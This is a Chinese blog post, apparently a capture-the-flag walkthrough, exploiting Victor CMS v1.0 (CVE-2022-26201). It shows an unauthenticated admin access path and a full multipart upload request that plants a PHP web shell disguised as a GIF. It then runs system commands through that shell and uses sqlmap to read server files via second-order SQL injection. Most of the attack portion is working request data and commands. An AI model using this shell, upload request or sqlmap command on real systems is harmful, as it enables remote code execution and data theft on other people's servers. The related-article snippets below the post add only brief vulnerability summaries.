CVE-2022-26201(二次注入+文件上传)

最新推荐文章于 2024-07-25 08:32:20 发布
最新推荐文章于 2024-07-25 08:32:20 发布
阅读量2.6k 收藏 2
点赞数 7
文章标签: 安全 web安全 网络安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/140669609
版权

简介

Victor CMS v1.0 存在二次注入漏洞和任意文件上传漏洞

任意文件上传

点击Admin,不用登录,直接进入,存在未授权访问

进入之后点击Users——>Add Users,只允许上传图片,上传抓包,更改后缀

注意:这里只允许上传权限马,普通的一句话上传是没有flag的。

抓包数据如下

POST /admin/users.php?source=add_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------401783054033296637582138189447
Content-Length: 1138
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/users.php?source=add_user
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_name"

123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_firstname"

1223
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_lastname"

123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_image"; filename="minglingzhixing.php"
Content-Type: image/jpeg

GIF89a
<?php system($_GET[1]);phpinfo();?>
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_role"

Admin
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_email"

1223@qq.com
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_password"

123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="create_user"

Add User
-----------------------------401783054033296637582138189447--

放包,直接获取flag

http://xxx/img/minglingzhixing.php?1=cat%20/flag

获取flag{71b2ac87-ae17-41af-8496-fd35a2ee5ad5}

二次注入

漏洞原理:二次注入漏洞的原理在于,Web应用程序在某个阶段(通常是数据存储或处理阶段)没有充分地验证、过滤或转义用户输入,然后将该输入存储到数据库、文件或其他存储设备中。然后,在后续的请求或操作中,应用程序再次使用了这个未经验证的用户输入,从而可能导致攻击者执行恶意操作。

位置在Categories处

直接在登陆框添加然后抓包

抓包数据如下

POST /admin/categories.php HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/categories.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

cat_title=13123123&submit=

直接丢入sqlmap爆库

发现不存在flag,换个思路,直接读取

python sqlmap.py -r ceshi.txt --file-read "/flag" --dbms Mysql

BTY@BTY
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境:CVE-2022-26201二次注入漏洞)
m0_65712192的博客
04-21 1265
Victor CMS v1.0 存在二次注入漏洞
春秋云境:CVE-2022-26201
一只爱吃橙子的羊
11-30 1152
Victor CMS v1.0 存在二次注入漏洞
春秋云镜 CVE-2022-26201/ CVE-2021-25203
qq_22002773的博客
07-22 240
春秋云镜 CVE-2022-26201/ CVE-2021-25203
CVE-2022-26201
龙狼刺的博客
06-18 200
Victor CMS v1.0 存在二次注入漏洞。
春秋云境:CVE-2022-29464(WSO2文件上传漏洞)
ZL_1618的博客
03-02 906
一、题目二、burp改包。
Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
jidunkeji的博客
04-06 4589
前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 1►前置知识 1.1 SpringMVC参数绑定 为了方便编程,SpringMVC支持将HTTP请求中的的请求参数或者请求体内容,根据Controller方法的参数,自动完成类型转换和赋值。之后,Controller方法就可以直接使用这些参数,避免了需要编写大
Weblogic任意文件上传漏洞(CVE-2018-2894)漏洞复现(基于vulhub)
人若无名,便可专心练剑
04-10 1797
这个任意文件上传CVE-2018-2894漏洞,Oracle公司在7月份修复,需要我们自己手动配置才可以进行漏洞测试,所以这就需要我们拿到weblogic网站的登录账号密码,这里很多网站其实在实际中,都是默认密码的存在,所以可以通过一些工具进行测试下。这个漏洞利用vulhub复现下来,没什么难度,新手也是完全ok的,平常一些护网面试啥的经常会问Java相关的漏洞问题,就比如weblogic漏洞。
weblogic漏洞复现】CVE-2017-10271+CVE-2020-14882远程命令执行漏洞+CVE-2018-2894任意文件上传漏洞+CVE-2018-2628反序列化远程代码执行漏洞
serendipity1130的博客
09-01 3506
1.CVE-2017-10271 漏洞成因: 由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞 触发漏洞url如下: http://192.168.225.139:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。 1.扫描到端口号为:7001,进行访问。 nmap192.168.225.138-sV-sC-P
finecms SQL注入(CVE-2017-11582)
m0_65150886的博客
01-08 678
其中任意文件上传漏洞在上传用户头像处,可通过上传一句话木马,修改数据包内容,获取网站Shell。而SQL注入漏洞则可以通过注入获取到管理员的账号密码。FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10版本存在任意文件上传SQL注入漏洞。6.修改jpeg为php,并将文件内容改为php一句话木马,并对其进行base64编码。1.访问http://ip:port,进入登录界面。5.点击上传头像,上传一个jpg图片,并抓包。3.通过报错注入查询当前用户。
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 797
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
防火墙--内容安全
banliyaoguai的博客
07-20 1247
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
气膜建筑的逃生通道设计与安全保障—轻空间
最新发布
Skansi的博客
07-25 296
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
探究大语言模型(LLM)漏洞和安全优秀实践
java_cjkl的博客
07-21 1146
你可能已听说过LLM强势亮相,至少ChatGPT就是代表。大语言模型(LLM)指语言处理模型。这类模型经过训练,可以执行各种各样的语言任务:翻译、文本生成和问题回答等。有几个LLM家族和架构,最著名的是GPT(生成式预训练Transformer)。每种 LLM都有各自的特定功能,但本文侧重介绍LLM普遍固有的安全问题。随着越来越多的公司集成LLM以增强用户体验或简化和加速内部流程,这种类型的集成特有的新漏洞随之出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值